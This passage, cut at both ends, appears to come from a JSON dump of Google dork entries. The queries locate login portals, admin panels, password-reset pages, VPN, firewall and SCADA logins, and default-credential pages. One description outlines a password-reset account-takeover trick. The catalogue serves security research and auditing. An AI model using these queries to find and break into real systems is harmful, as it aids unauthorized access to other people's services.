Enterprise.\r\ncheckmk.com\r\n\r\n\r\nAuthor:\r\n\r\nUsmanAliMaan"}, {"dork": "intitle:Check_MK Multisite Login", "description": "Dork for search Checkmk:\r\n\r\nCheckmk has long been available as an open source IT monitoring solution, supported by a large user community\r\n\r\n\r\nAuthor:\r\n\r\nUsmanAliMaan"}, {"dork": "intext:\"Rubicon Communications, LLC (Netgate)\" intitle:\"Login\"", "description": "This dork found Pfsense Login Portals.You can modify you your need or\r\ncountry extension.\r\n\r\nGoogle Dork : intext:\"Rubicon Communications, LLC (Netgate)\" intitle:\"Login\"\r\n\r\nBerat Isler ( root1x)"}, {"dork": "intitle:\"RabbitMQ Management\" inurl:15672", "description": "RabbitMQ Dashboard Logins\r\n\r\n# Google Dork: intitle:\"RabbitMQ Management\" inurl:15672\r\n# Date: [6-2-2020]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:VMware inurl:5480", "description": "VMware Appliance Management Logins\r\n\r\n# Google Dork: intitle:VMware inurl:5480\r\n# Date: [6-2-2020]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:\"saw.dll\" AND intitle:\"Sign In\"", "description": "# Dork #\r\n\r\ninurl:\"saw.dll\" AND intitle:\"Sign In\"\r\n\r\nLogin Portals."}, {"dork": "intitle:VMware intext:\"VMware, Inc. All rights reserved.\" AND \"Powered by VMware Studio\"", "description": "AUTHOR: CANCOM #RedTeam\r\n\r\n@ItsKarl0z\r\n\r\n++ VMware Studio Login ++\r\n\r\nintitle:VMware intext:\"VMware, Inc. All rights reserved.\" AND \"Powered by VMware Studio\"\r\nintitle:vSphere intext:\"Powered by VMware Studio\""}, {"dork": "inurl:\"auth.html\" intitle:\"SonicWall\"", "description": "Find sonicwall appliance login pages\r\n\r\n-- \r\n\r\n*Hilary Soita.*"}, {"dork": "inurl:/_layouts/userdisp.aspx?id= intext:password", "description": "This dork found various login portals:\r\n\r\ninurl:/_layouts/userdisp.aspx?id= intext:password\r\n\r\n\r\n*Wethenorthcvv"}, {"dork": "intitle:\"Pentaho User Console - Login\"", "description": "This dork finds Pentaho login page.\r\n\r\nintitle:\"Pentaho User Console - Login\"\r\ninurl:/pentaho/Login\r\n\r\n- Pomodori"}, {"dork": "intext:\"Welcome to JIRA\" \"Powered by a free Atlassian Jira community\"", "description": "intext:\"Welcome to JIRA\" \"Powered by a free Atlassian Jira community\"\r\n\r\nBy\r\n\r\nSagar Banwa"}, {"dork": "intext:OpenCart inurl:index.php?route=common/dashboard", "description": "Using this Dork we can find Admin panels of hosted OpenCart.\r\n\r\nhttps://www.opencart.com/\r\nhttps://www.linkedin.com/in/usmanalimaan/\r\n\r\nA free shopping cart system. OpenCart is an open source PHP-based online e-commerce solution.\r\nwww.opencart.com"}, {"dork": "inurl:\"Orion/Login.aspx?ReturnUrl=\"", "description": "Find solarwinds login pages\r\n\r\n*Hilary Soita.*"}, {"dork": "intitle:\"Log In JIRA\" inurl:\"8080:/login.jsp\"", "description": "The following dork gives you an extensive search result for login pages of\r\nJIRA\r\n\r\nintitle:\"Log In JIRA\" inurl:\"8080:/login.jsp\"\r\n\r\nBy Juveria Banu"}, {"dork": "intitle:\"WEB SERVICE\" intext:\"Please install plugins first!\"", "description": "Multiple Vendor CCTV Login Web Page\r\n\r\nintitle:\"WEB SERVICE\" intext:\"Please install plugins first!\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:\"/jw/web/login\"", "description": "Joget Workflow Enterprise framework login pages\r\n\r\ninurl:\"/jw/web/login\"\r\n\r\nAuthor: Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:\"/login.htm?page=\" intext:\"Loading login page\"", "description": "Blue Iris Cam Login Page\r\n\r\ninurl:\"/login.htm?page=\" intext:\"Loading login page\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:\"serverpush.htm\" intext:\"Real-time\"", "description": "\"Real-time IP Camera Monitoring System\" Login Page\r\n\r\ninurl:\"serverpush.htm\" intext:\"Real-time\"\r\n\r\nAuthor : Zulfiqar Wardi (yunaranyancat)"}, {"dork": "inurl:manager/login", "description": "Provides manager login pages, which are more or less meant for the admins.\r\n\r\nBy Juveria Banu."}, {"dork": "intitle:\"Outlook Web App\" inurl:\"/owa/auth\" logon ext:aspx", "description": "-- \r\n*Regards,*\r\n*Ubaid Ahmed*\r\n\r\n\r\n*https://UbaidAhmed.com *"}, {"dork": "intext:\"please enter your username and password\" inurl:login filetype:php", "description": "Category: Pages Containing Login Portals\r\n\r\n\r\nNicholas Doropoulos"}, {"dork": "intext:\"Please enter your new password\" inurl:login filetype:php", "description": "# Google Dork: intext:\"Please enter your new password\" inurl:login\r\nfiletype:php\r\n\r\n# By using this dork, pages containing login portals can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/LoginPanel.aspx", "description": "# Google Dork: site:*/LoginPanel.aspx\r\n\r\n# This dork found Login Panels.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Emre DURMAZ"}, {"dork": "site:*/AdminPanel.aspx", "description": "# Google Dork: site:*/AdminPanel.aspx\r\n\r\n# This dork found Admin Panels.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Emre DURMAZ"}, {"dork": "intext:\"Welcome Admin\"", "description": "# Google Dork: intext:\"Welcome Admin\"\r\n\r\n# By using this dork, pages containing various login portals can be found.\r\n\r\n# Date: 26/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/Citrix/storeweb", "description": "Category: Pages Containing Login Portals\r\n\r\nNicholas Doropoulos"}, {"dork": "intext:\"This computer system is the property of\" -error", "description": "Category: Pages Containing Login Portals\r\n\r\nNicholas Doropoulos"}, {"dork": "inurl:/forgotpassword intext:\"enter username and email\"", "description": "# Google Dork: inurl:/forgotpassword intext:\"enter username and email\"\r\n\r\n# The search results found from this dork, are potentially vulnerable sites\r\nto account takeover. If attacker inserts victim's username along with\r\nattacker's email address, than attacker might receive password reset link\r\nor code for the target user on his(attacker) own mail. Or, if attacker\r\nattempts password reset for his own account, then intercept and modifies\r\nthe http request body with victim credentials(i.e. username, email), than\r\nhe might successfully reach victim's password reset page. Using these two\r\nmethods, attacker might be able to takeover any user account.\r\n\r\n# Date: 25/03/2020\r\n\r\n# Author: Rafin Rahman Chowdhury"}, {"dork": "intext:\"Welcome! Log in or create an account to continue.\"", "description": "# Google Dork: intext:\"Welcome! Log in or create an account to continue.\"\r\n\r\n# By using this dork, various web pages containing login portals can be\r\nfound.\r\n\r\n# Date: 27/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:8080/webinterface intitle:\"crushftp\"", "description": "# Google Dork: inurl:8080/webinterface intitle:\"crushftp\"\r\n\r\n# By using this dork, various web interfaces for the Crush FTP containing\r\nlogin portals can be found.\r\n\r\n# Date: 27/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "site:*/retrieve.php", "description": "Login Portal:\r\n\r\nsite:*/retrieve.php\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "site:*/account-recovery.html", "description": "Login Portal:\r\n\r\nsite:*/account-recovery.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/retrieve-password", "description": "Login Portal:\r\n\r\nsite:*/retrieve-password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/resetpass.php", "description": "Login Portal:\r\n\r\nsite:*/resetpass.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/reminder_password", "description": "Login Portal:\r\n\r\nsite:*/reminder_password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/changePassword.php", "description": "Login portal:\r\n\r\nsite:*/changePassword.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/*/pwdrecovery.php", "description": "Login PORTAL:\r\n\r\nsite:*/*/pwdrecovery.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/adfs/ls/ intitle:\"Sign In\"", "description": "Login Portal:\r\n\r\nsite:*/adfs/ls/ intitle:\"Sign In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/signup/password.php", "description": "Login Portal:\r\n\r\nsite:*/signup/password.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/requestpassword.*", "description": "Login Portal:\r\n\r\nsite:*/requestpassword.*\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/membersarea intitle:\"login\"", "description": "Login Portal:\r\n\r\nsite:*/membersarea intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/forgot", "description": "Login Portal:\r\n\r\nsite:*/user/forgot\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/JIRA/login", "description": "JIRA Login page using\r\n\r\nsite:*/JIRA/login"}, {"dork": "site:*/admin/password.php", "description": "# Google Dork: site:*/admin/password.php\r\n\r\n#Date: 31/03/2020\r\n\r\n#Author: ASHIK KUNJUMON"}, {"dork": "inurl:r51173 intext:\"Keep me logged in\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "inurl:/global-protect/login.esp", "description": "# Dork #\r\n\r\ninurl:/global-protect/login.esp\r\n\r\nLogin Portals."}, {"dork": "inurl:/sslvpn/Login/Login", "description": "# Dork #\r\n\r\ninurl:/sslvpn/Login/Login\r\n\r\nLogin Portals."}, {"dork": "inurl:main_login.html intitle:Netgear", "description": "Exploit Title: Netgear Switch login pages.\r\nGoogle dork: inurl:main_login.html intitle:Netgear\r\nDate:4/1/2020\r\nExploit author: techjohnny"}, {"dork": "intext:\"Any time & Any where\" intext:\"Username\" intext:\"Password\" intext:login intext:\"View: Mobile | PC\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "site:*/request-new-password", "description": "Login Portal:\r\n\r\nsite:*/request-new-password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/password_lost.php", "description": "Login Portal:\r\n\r\nsite:*/password_lost.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/auth.php", "description": "Login Portal:\r\n\r\nsite:*/auth.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/auth.php?forgot_password=yes\"", "description": "Login Portal:\r\n\r\ninurl:\"/auth.php?forgot_password=yes\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:account.*.*/recovery", "description": "Login Portal:\r\n\r\nsite:account.*.*/recovery\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/PassRecover", "description": "Login Portal:\r\n\r\nsite:*/PassRecover\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/forgotpass", "description": "Login Portal using\r\n\r\nsite:*/user/forgotpass"}, {"dork": "site:*/signup/pass", "description": "Login Portal using\r\n\r\nsite:*/signup/pass"}, {"dork": "site:*/test/login", "description": "# Google Dork: site:*/test/login\r\n\r\n# By using this dork, pages containing various login portals can be found.\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"iot login\"", "description": "# Google Dork: \"login\" intitle:\"iot login\"\r\n\r\n# Pages containing various IoT () login portals can be found.\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"login.html\" intitle:\"d-link\"", "description": "Google Dork: inurl:\"login.html\" intitle:\"d-link\"\r\nDescription: Pages containing d-link routers login pages.\r\nAuthor: Abhi Chitkara"}, {"dork": "site:*/lost-password/", "description": "Login Portal:\r\n\r\nsite:*/lost-password/\r\n\r\nReza Abasi(Turku)"}, {"dork": "\"Welcome to Sentry, please log in:\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "inurl:/DeclaranetPlusWebapp/ intext:Entrar", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "intext:\"Welcome Site/User Administrator\"", "description": "# Google Dork: intext:\"Welcome Site/User Administrator\"\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "site:.\"atlassian.net\" \"Log in to your account\"", "description": "Exposes login portals that may expose internal service desks.\r\n\r\nsite:.\"atlassian.net\" \"Log in to your account\"\r\nsite:\".atlassian.net\" / \"service desk/customer/user/login\""}, {"dork": "inurl:8080/portal/pda/?force.login=yes", "description": "# Google Dork: inurl:8080/portal/pda/?force.login=yes\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:start.swe?SWECmd", "description": "This dork is for exposing Siebel login portals. I consider it a serious\r\nflaw as Siebel uses anonymous users and you can actually view content if by\r\naccident responsibilities are assigned to this anonymous user."}, {"dork": "inurl:/8080/login.html", "description": "# Google Dork: inurl:/8080/login.html\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 23/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"The default username and password is admin:admin\" intitle:Login OR inurl:login.php", "description": "# Google Dork: \"The default username and password is admin:admin\"\r\nintitle:Login OR inurl:login.php\r\n\r\n# Default user name and password admin:admin.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"/dynamic/password-reset.html\"", "description": "Login Portal:\r\n\r\ninurl:\"/dynamic/password-reset.html\"\r\ninurl:\"/dynamic/login.html\" intitle:\"Linksys\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Fortinet - Login\"", "description": "# Google Dork: intitle:\"Fortinet - Login\"\r\n\r\n# Pages containing Login Portals.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/dynamic/login.html intext:\"Linksys Smart Wi-Fi Sign In\"", "description": "Category: Pages Containing Login Portals\r\nNicholas Doropoulos"}, {"dork": "intitle:\"OpenMeetings\" intext:\"Username or mail address\"", "description": "Dork: intitle:\"OpenMeetings\" intext:\"Username or mail address\"\r\nInfo: Apache OpenMeetings login portals\r\n\r\nAuthor: M. Cory Billington (@_th3y)"}, {"dork": "inurl:userportal/webpages/myaccount/login.jsp", "description": "Juicy information (Firewall Login)\r\n\r\nMalkit Singh"}, {"dork": "site:*/dana-na/auth/welcome.cgi?p=rolelogo", "description": "Author: MiningOmerta\r\n\r\nFinds some pretty sensitive login portals.\r\n\r\nhttps://google.com/search?q=site:*/dana-na/auth/welcome.cgi?p=rolelogo\r\n\r\nsite:*/dana-na/auth/welcome.cgi?p=rolelogo"}, {"dork": "site:*/asana/login", "description": "Find the Asana login panel using\r\n\r\nDORK: site:*/asana/login\r\n\r\n~ Irshad Ahamed"}, {"dork": "site:*/login/pass", "description": "Password reset portals\r\n\r\nDORK: site:*/login/pass\r\n\r\n~ Irshad Ahamed"}, {"dork": "site:*/Drupal/login", "description": "Name [Adarsh Lal]\r\nGoogle Dork [site:*/Drupal/login]"}, {"dork": "\"index of\" \"adminer.php\"", "description": "Dork: \"index of\" \"adminer.php\"\r\nDescription: This Google dork can be used to discover servers with\r\nadminer.php files which can be accessed to try and log in to the database.\r\nAuthor: Jinson Varghese Behanan (@JinsonCyberSec)\r\nAuthor Homepage: https://www.jinsonvarghese.com"}, {"dork": "site:*/auth/forgot", "description": "Login portals:\r\n\r\nsite:*/auth/forgot\r\nsite:*/auth/password\r\nsite:*/auth/login intitle:\"sign in\"\r\nsite:*/auth/password/request\r\nsite:*/auth/restore\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/emptyView4.html", "description": "#Author: MiningOmerta\r\n#Finds outdated and publicly exposed Sonicwall Firewalls. If one erases emptyView4.html once at the website and instead uses\r\n# the less indexed http://site/auth1.html, it will typically show the Perimeter Firewall login page\r\n# from the link on that page you can navigate to https://site/sslvpnLogin.html which will usually to domain VPN login with domain(s) name listed in the dropdown.\r\n\r\nDork:\r\n\r\ninurl:/emptyView4.html"}, {"dork": "intext:\"Launch FortiClient\" and \"Please Login\"", "description": "This dork found FortiClient Login Portals.\r\n\r\nGoogle Dork: intext:\"Launch FortiClient\" and \"Please Login\"\r\n\r\nAuthor: Berat ISLER (root1x)"}, {"dork": "inurl:admin.aspx", "description": "Dork: inurl:admin.aspx\r\nDescription: This google dork lists out asp.net admin pages for web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:adminlogin.asp", "description": "# Google Dork: \r\ninurl:adminlogin.asp\r\ninurl:administratorlogin.asp\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:enter.php?phpbb_root_path=", "description": "# Google Dork: inurl:enter.php?phpbb_root_path=\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:client_id=", "description": "# Google Dork: inurl:client_id=\r\n\r\n# Various pages containing login portals.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"ShowIt-Admin\"", "description": "# Google Dork: intitle:\"ShowIt-Admin\"\r\n\r\n# ShowIt configuration panels.\r\n\r\n# Date: 22/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"You need to be logged in to see your course progress.\"", "description": "I want to share a google dork which helps to reveal all the website using wp-courseware plugin. and it reveals website having course hosted on there website.\r\n\r\nGoogle Dork: \"You need to be logged in to see your course progress.\"\r\n\r\nDate: [23/05/2020] \r\nAuthor: Nitesh kumar pandey\r\nVendor Homepage: https://flyplugins.com/wp-courseware/"}, {"dork": "inurl:pentaho/Login", "description": "Find pentaho login portals\r\n\r\n*Hilary Soita.*"}, {"dork": "inurl:login.jsf", "description": "Dork:- inurl:login.jsf\r\n\r\nDescription:-\r\nThis Dork id used to find the Login portal of web page developed under\r\n java based technology login web page.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "intitle:\"Ice Hrm Login\" intext:\"Forgot Password\"", "description": "# Google Dork: intitle:\"Ice Hrm Login\" intext:\"Forgot Password\"\r\n\r\n# Pages containing login portals, where some of them use weak passwords,\r\nlike admin/admin.\r\n\r\n# Date: 25/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:\"forgotpassword.jsf\"", "description": "Dork: inurl:\"forgotpassword.jsf\"\r\nDescription: This google dork lists out java server pages based forgot\r\npassword forms.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:forgotpassword.asp", "description": "* Google Dork: *\r\n\r\ninurl:forgotpassword.asp\r\n\r\n*Various pages containing forgot password portals.*\r\n\r\n*AUTHOR : ANJALI PRAKASH *"}, {"dork": "intitle:\"HP System Management Homepage\" inurl:cpqlogin", "description": "# Google Dork: intitle:\"HP System Management Homepage\" inurl:cpqlogin\r\n\r\n# Description: Find HP System Management Homepage.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "intitle:\"ASUS\" AND inurl:\"Main_Login.asp\" AND intext:\"router account\" -asus.com", "description": "# Google Dork: intitle:\"ASUS\" AND inurl:\"Main_Login.asp\" AND intext:\"router\r\naccount\" -asus.com\r\n\r\n# Description: Find ASUS router login page for different versions.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "inurl:\"forgotpassword.aspx\"", "description": "Dork:- inurl:\"forgotpassword.aspx\"\r\n\r\nDescription:-\r\nThis google dork lists out out asp.net server page based forgot password\r\npage.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "inurl:login_admin \"admin\"", "description": "# Title: Find admin login panels\r\n# Google Dork: inurl:login_admin \"admin\"\r\n# Date : 27/05/2020\r\n# Author: Ritik Sahni"}, {"dork": "inurl:adminlogin.php", "description": "Dork: inurl:adminlogin.php\r\nDescription: This google dork lists out php admin login pages for a web\r\nserver\r\nAuthor: Abhi Chitkara"}, {"dork": "site:*/joomla/login", "description": "Login page of websites developed in Joomla\r\n\r\nGoogle Dork: site:*/joomla/login\r\n\r\nAuthor: Mayank Chandelkar"}, {"dork": "inurl:forgotpassword.htm", "description": "*# Google Dork:*\r\n\r\n* inurl:forgotpassword.htmDescription:- Various pages containing\r\nforgot password portals*\r\n\r\n*# Author: Janmejaya Swain\r\n# Date: 28-May-2020\r\n# Linkedin:\r\nhttps://www.linkedin.com/in/janmejayaswainofficial"}, {"dork": "\"login\" intitle:\"*board login\"", "description": "# Google Dork: \"login\" intitle:\"*board login\"\r\n\r\n# Various pages containing board login portals.\r\n\r\n# Date: 28/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"*scada login\"", "description": "# Google Dork: \"login\" intitle:\"*scada login\"\r\n\r\n# Various SCADA login portals.\r\n\r\n# Date: 28/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"*dashboard login\"", "description": "# Google Dork: \"login\" intitle:\"*dashboard login\"\r\n\r\n# Various Dashboard login portals.\r\n\r\n# Date: 28/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:resetpassword.aspx", "description": "Dork:\r\ninurl:resetpassword.aspx\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:\"resetpassword.asp\"", "description": "Dork:\r\ninurl:\"resetpassword.asp\"\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:\"passwordreset.php\"", "description": "Dork:\r\ninurl:\"passwordreset.php\"\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:adminlogin.jsp", "description": "- *Google Dork:*\r\n\r\n* inurl:adminlogin.jsp*\r\n\r\n- *Results:* *The results gives a list of admin login page of various\r\nwebsite.*\r\n- *Date:* *28/05/2020*\r\n- *Author:* *Vikash Kumar*"}, {"dork": "inurl:adminlogin.html", "description": "inurl:adminlogin.html\r\n\r\nDescription:- This dork id will find the admin login portal devloped under\r\nHTML technology\r\n\r\nAuther:- Deepesh Kumar Pandey"}, {"dork": "inurl:forgotpassword.do", "description": "# Google Dork: inurl:forgotpassword.do\r\n\r\n# Description:- Various pages containing forgot password portals\r\n\r\n# Author: Janmejaya Swain\r\n# Date: 28-May-2020\r\n# Linkedin: https://www.linkedin.com/in/janmejayaswainofficial"}, {"dork": "inurl:adminlogin.do", "description": "# Google Dork inurl:adminlogin.do\r\n\r\n# Description:- list of admin login page of various websites.\r\n\r\n# Author: Janmejaya Swain\r\n# Date: 28-May-2020\r\n# Linkedin: https://www.linkedin.com/in/janmejayaswainofficial"}, {"dork": "inurl:admlogin.aspx", "description": "List of Admin Login Page of various website"}, {"dork": "inurl:admlogin.php", "description": "# Google Dork: inurl:admlogin.php\r\n\r\n# Description:- This page contains various php admin login pages for a web\r\nserver.\r\n\r\n# Author: Suhanaz Kazi\r\n# Date: 29-May-2020\r\n-- \r\nRegards,\r\nSuhanaz"}, {"dork": "inurl:\"/forgotpassword.php\"", "description": "# Google Dork inurl:\"/forgotpassword.php\"\r\n\r\n# Description:- Various pages containing forgot password portals which will\r\ninclude various router password page, govt websites, many other companies\r\nwho have php page of forgot password.\r\n\r\n# Author: Agrah Jain\r\n# Date: 30-May-2020"}, {"dork": "site:*/password_forgotten.php", "description": "Login Portal:\r\n\r\nsite:*/password_forgotten.php\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "inurl:adminlogin.htm", "description": "# Google Dork inurl:adminlogin.htm\r\n\r\n# Description:- list of admin login page of various websites.\r\n\r\n# Author: Agrah Jain\r\n# Date: 30-May-2020"}, {"dork": "inurl:\"resetpassword.jsf\"", "description": "Dork:\r\ninurl:\"resetpassword.jsf\"\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:adminpanel.aspx", "description": "inurl:adminpanel.aspx\r\ndescription: Rhis dork id will find the admin panel created with aspx\r\ntechnology\r\n\r\nAuthor: Deepesh Kumar Pandey"}, {"dork": "inurl:userlogin.do", "description": "Dork:\r\ninurl:userlogin.do\r\n\r\nDescription: This google dork lists out the various pages containing user\r\nlogin portals.\r\n\r\nAuthor: Abhinav Porwal\r\nCompany: Cyber Defender\r\nLinkedIn: https://www.linkedin.com/in/abhinavporwal6/"}, {"dork": "inurl:login.do?method=login", "description": "Dork:\r\ninurl:login.do?method=login\r\n\r\nDescription: This google dork lists out the various pages containing login\r\nportals.\r\n\r\nAuthor: Abhinav Porwal\r\nCompany: Cyber Defender\r\nLinkedIn: https://www.linkedin.com/in/abhinavporwal6/"}, {"dork": "inurl:admin/admin/Login", "description": "# Google Dork: inurl:admin/admin/Login\r\n\r\n# Description:- This page contains various admin login portals.\r\n\r\n# Author: Suhanaz Kazi\r\n# Date: 29-May-2020\r\n# Linkedin: http://linkedin.com/in/suhanaaz\r\n-- \r\nRegards,\r\nSuhanaz"}, {"dork": "inurl:auth/Login", "description": "# Google Dork: inurl:auth/Login\r\n\r\n# Description:- This page contains various login pages for a web server.\r\n\r\n# Author: Suhanaz Kazi\r\n# Date: 29-May-2020\r\n# Linkedin: http://linkedin.com/in/suhanaaz\r\n-- \r\nRegards,\r\nSuhanaz"}, {"dork": "inurl:admin/login.aspx", "description": "# Google Dork: inurl:admin/login.aspx\r\n# Results: List of Admin Login Webpage generated by web servers\r\n# running the Microsoft ASP.NET framework.\r\n# Date: 2020-05-31\r\n# Author: Vikash Kumar\r\n# Linkedin: https://www.linkedin.com/in/vikash-kumar-7b938a176\r\n# Twitter: https://twitter.com/vksutk\r\n\r\n\r\n-- \r\nThanks & Regards\r\n*Vikash Kumar*"}, {"dork": "inurl:admin/upload.asp", "description": "# Google Dork: inurl:admin/upload.asp\r\n# Sensitive directories and login portals.\r\n# Date: 29/05/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:resetpassword.do", "description": "Dork: inurl:resetpassword.do\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal\r\nCompany: Cyber Defender\r\nLinkedIn: https://www.linkedin.com/in/abhinavporwal6/"}, {"dork": "inurl:\"/index.php?route=account/forgotten\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?route=account/forgotten\"\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "inurl:emplogin.aspx", "description": "# Google Dork: inurl:emplogin.aspx\r\n# List of Employee login page of various website\r\n# Author: AJAYSEN R"}, {"dork": "inurl:\"passwordreset.asp\"", "description": "Dork:- inurl:\"passwordreset.asp\"\r\nImpact:- Various pages containing password reset portals\r\n\r\nAuthor:- Shivansh Kumar\r\nIndependent security researcher\r\nIndia"}, {"dork": "inurl:admlogin.asp", "description": "# Google Dork : inurl:admlogin.asp\r\n# Description:- This Page contains various asp admin login pages for a web server\r\n# Author: Md Anzaruddin\r\n# Date: 04/06/2020"}, {"dork": "site:*/auth.html intitle:login", "description": "# Google Dork site:*/auth.html intitle:login\r\n# Description:- This dork is used to get the login portals of the websites.\r\n# Author: Agrah Jain\r\n# Date: 30-May-2020\r\n# Linkedin: https://www.linkedin.com/in/agrahjain"}, {"dork": "inurl:\"forgotpassword.php\"", "description": "Dorks : inurl:\"forgotpassword.php\"\r\nDescription: various pages containing forgot passwords portals.\r\nAuthor : Anjali Prakash"}, {"dork": "inurl:emplogin.html", "description": "# Google Dork: inurl:emplogin.html\r\n# Exploit Title: Find the employee login page in different website including 'emplogin' as substring.\r\n# Author: Pritam Singh\r\n\r\n\r\nThanks,\r\n\r\n*Pritam Singh*\r\nSecurity Researcher\r\nCEH, RHCSA, N+\r\n\r\nemail: pritamsingh.cyber@gmail.com"}, {"dork": "intitle:\"index of\" \"admin-login.php\"", "description": "Dork: intitle:\"index of\" \"admin-login.php\"\r\nDescription: This google dorks lists out admin login php pages on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:Cpanel/login.aspx", "description": "#Google Dork:- inurl:Cpanel/login.aspx\r\n\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web\r\nserver. Most of them are Vulnerable to Brute force.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\nTwitter:https://twitter.com/mdanzaruddin\r\n\r\n#Date: 04-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "inurl:Cpanel/login.php", "description": "#Google Dork:- inurl:Cpanel/login.php\r\n\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web server.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\nTwitter:https://twitter.com/mdanzaruddin\r\n\r\n#Date: 04-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "intitle:adminlogin inurl:login", "description": "#Google Dork:- intitle:adminlogin inurl:login\r\n\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web\r\nserver.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\nTwitter:https://twitter.com/mdanzaruddin\r\n\r\n#Date: 04-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "inurl:admin/login.jsp", "description": "Dork : inurl:admin/login.jsp\r\nDescription : List of admin login portals of various website.\r\nAuthor: Ajaysen R"}, {"dork": "inurl:employee-login.php", "description": "Dork: inurl:employee-login.php\r\nDescription: This google dorks lists out employee login pages on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"Intranet 